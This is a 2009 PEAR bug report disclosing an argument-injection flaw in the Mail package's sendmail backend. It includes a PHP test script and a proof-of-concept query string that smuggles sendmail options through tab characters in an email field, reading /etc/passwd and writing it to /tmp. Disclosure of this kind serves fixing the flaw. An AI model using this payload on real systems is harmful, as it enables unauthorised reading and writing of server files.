Edit report at http://pear.php.net/bugs/bug.php?id=16200&edit=1
ID: 16200
Updated by: daniel.oconnor@gmail.com
Reported By: root at 80sec dot com
Summary: security hole allow to read/write Arbitrary File
-Status: Open
+Status: Critical
Type: Bug
Package: Mail
Operating System: linux
Package Version: 1.1.14
PHP Version: 5.2.5
Roadmap Versions:
New Comment:
-Status: Open
+Status: Critical
Bumping to critical for the moment.
Previous Comments:
------------------------------------------------------------------------
[2009-05-08 05:19:14] doconnor
Looks like this is safe on windows.
------------------------------------------------------------------------
[2009-05-07 11:16:17] websec
Description:
------------
The mail package used escapeshellcmd function Incorrectly,so it may
allow to read/write Arbitrary File
Test script:
---------------
<?php
ini_set('include_path',ini_get('include_path').':/usr/local/lib/php/PEAR:');
require_once("Mail.php");
$from = "From: " . $_REQUEST['email'] . "\r\n";
$to = "xxxxxxx@zzzz.com";
$subj = "subscription request";
$body = "subscribe me";
$hdrs = array(
"To" => $to,
"Cc" => $cc,
"Bcc" => $bcc,
"From" => $from,
"Subject" => $subject,
);
$body="test";
$mail =& Mail::factory('sendmail');
$mail->send($to, $hdrs, $body);
?>
test.php?1=3&email=xxxxx%09-C%09/etc/passwd%09-X%09/tmp/wokao%09zzz@x%09.com&l=2&1=3
Expected result:
----------------
this may read /etc/passwd and write it to /tmp/wokao
Actual result:
--------------
this may read /etc/passwd and write it to /tmp/wokao
------------------------------------------------------------------------
